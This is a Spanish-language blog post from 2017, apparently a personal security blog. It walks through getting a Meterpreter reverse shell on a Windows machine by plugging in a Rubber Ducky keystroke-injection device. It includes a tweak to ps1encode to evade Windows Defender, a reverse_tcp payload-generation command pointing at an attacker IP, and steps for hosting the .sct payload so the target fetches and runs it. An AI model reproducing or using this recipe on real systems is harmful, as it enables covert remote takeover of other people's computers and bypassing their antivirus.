Se me cayo un exploit

SEGURIDAD INFORMÁTICA

HACKING . PROGRAMACIÓN . ELECTRÓNICA . GNU/LINUX

Se me cayó un exploit en tu server.... por @UnaPibaGeek

[email protected]:~# ./PenTest

Porque de algo hay que vivir (?

Meterpreter con Rubber Ducky

rd.png

Hace frío... había que buscar algo para hacer. En realidad tengo una tonelada de cosas para hacer :( pero queriendo salir de la rutina, miré hacia mi izquierda y vi ahí tirado un Rubber Ducky que me traje de Delloite la última vez que visité a mi amigo @clucianomartins :)

Aún no había jugado con este juguete, aunque ya lo conocía. Me propuse buscar la forma más fácil y rápida de obtener una sesión de meterpreter en el target, utilizando este hardware de Hak5.

Si leyeron algún paper mío, sabrán que mi forma favorita de obtener una sesión de meterpreter en un objetivo es a través de un archivo .SCT. y es mi manera favorita por la capacidad de evadir AV/IDS que tiene este método y además porque si está bien configurado, funciona muy rápido.

Implementé esta técnica con Eternalromance en el paper que escribí sobre cómo aprovechar dicha vulnerabilidad en Windows Server 2016, y a partir de ahí, Microsoft creó una firma para Windows Defender de manera que ahora me detecta mi ataque favorito (wahhh los odio xD). Pero le dí una vuelta de tuerca más y ya pude obtener mi sesión de meterpreter bypasseando el Defender ;-).

Esa será la técnica que utilizaremos ahora con Rubber Ducky, para obtener rápidamente una sesión de meterpreter en el target.

La herramienta que necesitamos para generar el payload en formato .SCT es ps1encode, la descargamos desde aquí: https://github.com/CroweCybersecurity/ps1encode.

Vamos a realizarle una pequeña modificación, para saltarnos el Defender de ahora xD abrimos el script ps1encode.rb con cualquier editor de texto, y nos dirigimos a la línea 99. Allí, donde se ejecuta el comando que genera el payload, añadiremos lo siguiente: -e x86/shikata_ga_nai -b "x00".

Quedará así:



Ahora sí, guardamos y utilizamos esta versión del script.
Generamos el payload con los siguientes parámetros: sudo ./ps1encode.rb --PAYLOAD windows/meterpreter/reverse_tcp --LHOST=[IP_ATACANTE] --LPORT=1337 -t sct



Esto nos creará un archivo llamado index.sct en esa misma carpeta. Lo que debemos hacer es asignar permisos 777 a ese archivo y moverlo a donde tenemos el servidor web en la máquina atacante. Usualmente en /var/www/html.
La idea es que este archivo .sct pueda ser accedido de la siguiente forma: http://IP_ATACANTE/index.sct.

La última línea que vemos en la salida del comando, es lo que se debe ejecutar en la máquina target. La copiaremos a nuestro script para el Rubber Ducky.



Ese es todo el script que necesitamos, en el lenguaje que entiende el Rubber Ducky. Entre algunos delays, lo que hace es abrir la ventana de "run" y escribir el comando necesario.

Utilizaremos la web: https://www.ducktoolkit.com/encoder/ para generar el .bin para el Rubber Ducky



Un paso súper importante aquí, es seleccionar el idioma de teclado correcto a la derecha. En mi caso seleccioné "Spain" porque la máquina target tiene el teclado en español.

Presionamos en "Generate Script" y tras unos segundos contaremos con la siguiente opción:



Al presionar "Inject.bin" se nos descargará ese archivo, el cual tenemos que copiar a la MicroSD del Rubber Ducky.



Una vez hecho esto, ya tenemos el Rubber Ducky listo para usar. El siguiente paso es configurar el multi/handler de Metasploit para recibir la conexión inversa.



Una vez que conectamos el Rubber Ducky en la máquina target, obtenemos la sesión de meterpreter...



Bueno, espero que les sea de utilidad :)
¡Nos leemos pronto!.

¿Te cansaste de leer? Tomate un café (share):

Fecha: 05/09/2017

¡Suscribite!

Aprendé más en...